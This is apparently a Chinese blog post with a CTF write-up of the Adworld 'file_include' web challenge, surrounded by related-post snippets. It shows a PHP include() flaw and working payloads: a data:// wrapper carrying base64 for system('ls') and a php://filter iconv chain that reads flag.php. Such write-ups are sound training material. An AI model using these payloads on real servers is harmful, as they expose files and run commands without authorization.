ctfer的web日常:file_include(攻防世界)

最新推荐文章于 2024-12-28 08:00:00 发布
原创 最新推荐文章于 2024-12-28 08:00:00 发布 · 566 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端

代码审计:

<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>

文件包含漏洞,尝试读取/etc/passwd:

尝试用伪协议:

  • 尝试用file://伪协议,file://flag.php, ;
  • 尝试用data://伪协议,filename=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=,base64解密为<?php system('ls');?>,但是过滤了base64;
  • 尝试用data://伪协议,filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=flag.php,成功。

 

 

Hunter1_1
关注
攻防世界(CTF)~web-fileinclude
海鸥先生的博客
04-21 783
本题主要涉及到php伪协议和代码审计,如果文章有错误希望及时和小白我联系进行更改! 加油,又是刷题的一天!
攻防世界-file_include
m0_49025459的博客
12-18 8283
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
攻防世界file_include
m0_74979597的博客
09-13 3048
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
攻防世界file_include
小缪的博客
06-10 3407
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界-fileclude
m0_49025459的博客
12-28 1365
访问题目场景阅读php代码构造payload,这里文件包含的file1使用的是php伪函数进行传输的,file2使用的data://text/plain进行内容的传入。
file_include(攻防世界)
热门推荐
m0_56107268的博客
11-14 1万+
php转化器的学习
攻防世界-web-file_include
MateSnake的博客
05-12 911
攻防世界-web-file_include
攻防世界 file_include
最新发布
weixin_68416970的博客
12-28 647
攻防世界平台 web题库矩阵 新手模式 file_include
vue打包:Failed to load resource: net::ERR_FILE_NOT_FOUND问题
zxw939832359的博客
12-28 5991
vue项目npm run build 打包会出现: Failed to load resource: net::ERR_FILE_NOT_FOUND 总结解决办法: config/index.js里将assetsPublicPath:’/‘改成assetsPublicPath:’./' assetsRoot: path.resolve(__dirname, '../dist'), assetsSubDirectory: 'static', assetsPublicPath:
error:2006D080:BIO routines:BIO_new_file:no such file
qq_36856047的博客
05-19 5989
问题描述: 局域网配置https,nginx重启后异常, 2022/05/19 15:11:36 [emerg] 1#1: cannot load certificate "/etc/nginx/test.crt": BIO_new_file() failed (SSL: error:02001002:system library:fopen:No such file or directory:fopen('/etc/nginx/test.crt','r') error:2006D080:BIO ro
攻防世界---fileinclude
m0_72447684的博客
10-11 1643
攻防世界---fileinclude
攻防世界-fileinclude
2301_79858466的博客
07-21 2585
💡 convert.base64-encode/convert.base64-decode是转换过滤器属于read的参数,💡 相当于base64_encode()和 base64_decode(),作用是base64 编码解码。💡 read= 该参数可选。可以设定一个或多个过滤器名称,以 管道符(|)分隔。两个链的过滤器> 任何没有以 read= 或 write= 作前缀的筛选器列表会视情。💡 resource= 必须项。💡 write= 该参数可选。
攻防世界file_include (PHP伪协议+过滤器)
2302_79800344的博客
04-01 819
打开题目环境:进行PHP代码审计,发现这是一个文件包含漏洞。我们尝试利用PHP伪协议中的 php://filter来读取 check.php 中的内容。构造payload 并提交:发现payload被过滤掉了,我们就需要尝试使用不同的转换器。PHP各类转换器首先尝试 字符串过滤器--失败。然后尝试转换过滤器,前四种转换过滤器均失效,最后尝试 convent.iconv转换器。利用 Burpsuite intruder模式中的集束炸弹 cluster bomb 对其进行暴力破解:再将该PHP支持的字符编码导入
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3737
攻防世界 -- fileinclude
攻防世界 fileinclude
qq_73861475的博客
05-20 856
因为变量是用cookie传参的,所以我们构造的playload是关于cookie的,在bp里面将cookie更改为我们构造的,最后就会得到。红线圈出来的就是flag的base64编码值,所以我们要将红线圈出来的值进行base64解码就会得到flag。include函数用php://filter伪协议来绕过。我们可以看这个页面知道flag在flag.php这个文件中,而且还有文件路径为。首先打开题目进入环境,在此之前题目没有太多提示。传参,所以我们要改cookie的值。可以用于读取、写入文件等函数。
攻防世界fileinclude
……
09-13 8110
攻防世界文件包含题目
JavaScript获取文件路径的多种方法:无__FILE__常量解决方案
由于JavaScript不像PHP那样提供了内置的`__FILE__`常量,开发者需要采用不同的策略来实现这一功能。 1. **jQuery中的方法**: jQuery提供了一个简单的方法来获取最后引入的script标签的src属性,即`$("script")....
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值